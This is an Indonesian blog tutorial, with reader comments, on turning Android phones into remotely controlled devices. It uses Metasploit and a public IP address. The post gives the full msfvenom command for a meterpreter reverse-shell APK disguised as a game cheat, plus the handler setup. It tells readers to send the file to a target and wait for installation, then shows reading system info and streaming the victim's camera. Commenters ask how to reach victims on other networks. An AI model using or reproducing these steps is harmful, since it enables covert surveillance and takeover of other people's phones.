Halo semua, kali ini saya akan memberikan tutorial bagaimana cara exploit android dengan metasploit di ip public, saya kali ini menggunakan Backbox Linux 4.4, kalian juga bisa menggunakan distro linux yang lain asal ada metasploitnya :D, langkah-langkahnya sama kok dengan cara ini

oke langsung saja
pertama kita harus Setting Port Forwarding pada router, tentunya kalian harus login sebagai admin, kemudian cari pengaturan NAT, cek enabled DMZ, lalu isikan local ip kalian. jangan lupa di save

Setting Port Forwarding di Router

oke lanjut, cek terlebih dahulu ip public dengan cara mengetikkan di terminal sudo curl ifconfig.me atau bisa di cek di www.whatismyip.com
setelah mengetahui ip public selanjutnya buat backdor dengan msfvenom
sudo msfvenom -p android/meterpreter/reverse_tcp lhost=180.214.232.78 lport=443 R > CheatCoc.apk
sudo msfvenom -p android/meterpreter/reverse_tcp lhost=180.214.232.78 lport=443 R > CheatCoc.apk

Kalian sesuaikan lhost dengan ip public kalian, lport juga bisa di isi terserah, CheatCoc.apk merupakan nama backdoor yang dibuat

setelah backdoor terbuat sekarang buka metasploit console
msfconsole
 oke selanjutnya tinggal kita jalankan exploit
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.106
set lport 443
exploit
set payload android/meterpreter/reverse_tcp

lhost isi dengan ip local
lport sesuaikan dengan lport backdoor yang dibuat
sekarang tinggal kirimkan backdoor tadi ke target, tunggu taget menginstall backdoor dan membukanya

nahh, meterpreter sessions 1 opened, exploitnya berhasil bro :D

meterpreter sessions 1 opened

Coba cek infomasi sistem target

sysinfo

Streaming camera korban


Beberapa perintah meterpreter yang lain untuk android


Sekian tutorial mengenai Cara Exploit Android dengan Metasploit di IP Public semoga bermanfaat. ini hanya sebuah pembelajaran, penyalahgunaan dari tutorial ini bukan tanggung jawab saya, Terima kasih

Posting Komentar

  1. mantep mas postingan nya..smoga makin maju...

    BalasHapus
    Balasan
    1. Komentar ini telah dihapus oleh pengarang.

      Hapus
    2. permisi mas,saya mau nanya nih,kalau kita menggunakan ip public itu apakah,kita hanya bisa masuk sekali saja pada android target./meskipun telah di persistence

      karna kan ip public itu biasa nya berubah ubah..

      Hapus
  2. Master kalo make jaringan wifi umum bisa ga buat nyari korban yg beda jaringan?

    BalasHapus
  3. Ini syarat2nya apa aja yah mas? Harus dalam jaringan yg sama atau bisa beda jaringan?

    Soalnya saya coba beda jaringan tapi gag bisa, sesionnya gag jalan,

    BalasHapus
  4. Terjadi masalah saat mengurai paket. ,, itu kenapa ya gan , ?

    BalasHapus
    Balasan
    1. mungkin krn blm di sign apknya mas, waktu itu saya masih work sih bisa d install tanpa sign, coba lihat video saya yg d youtube. dsana saya beri cara juga buat sign apknya

      Hapus
  5. ini ngegunain 1 jaringan atau beda jaringan.Thanks

    BalasHapus
    Balasan
    1. ini saya test, dg backbox linux yg terkoneksi wifi speedy trus androidnya pake data seluler mas

      Hapus
    2. saya tes ke teman saya yg pake jaringan seluler kok ngga bisa mas,..

      Hapus
    3. gan,bisa bantu saya untuk setting zte f660 untuk exploit beda jaringan ga?kalo bisa add akun gmail saya, bariqif9@gmail.com

      atau engga agan punya facebook ga?

      Hapus
  6. Komentar ini telah dihapus oleh pengarang.

    BalasHapus
  7. bila ip public speedy berubah-ubah (IP DYNAMIC) brarti mesti buat & kirim lagi ke target ???

    BalasHapus
    Balasan
    1. iya harus kirim backdoor lg mas =)), enak lagi kalo pke vps mas , install metaploit di vps :d

      Hapus
    2. waduuh harus blajar bikin VPS. Kasih Tutorialnya dong kk tentang VPS

      Hapus
    3. bang kasih tutorial vps nya dong

      Hapus
  8. gan mau nanya. webcam streamnya kok gk hidup walaupun udh di buka dengan browser??

    BalasHapus
  9. ini cuma bisa jaringan dan target harus seluler berarti. karena kalau target terkoneksi dengan jaringan lain berarti beda lg setting nya

    BalasHapus
  10. Gan, semisal menggunakan VPS gimana ?

    BalasHapus
  11. gan,bisa bantu saya untuk setting zte f660 untuk exploit beda jaringan ga?kalo bisa add akun gmail saya, bariqif9@gmail.com

    atau engga agan punya facebook ga?

    BalasHapus
  12. Kalau cara cek localPort itu gimana gan?

    BalasHapus
  13. Gan, kok di ane commant nit fount. Kenapa ya ?? Mohon pencerahan nya gan

    BalasHapus

 
Top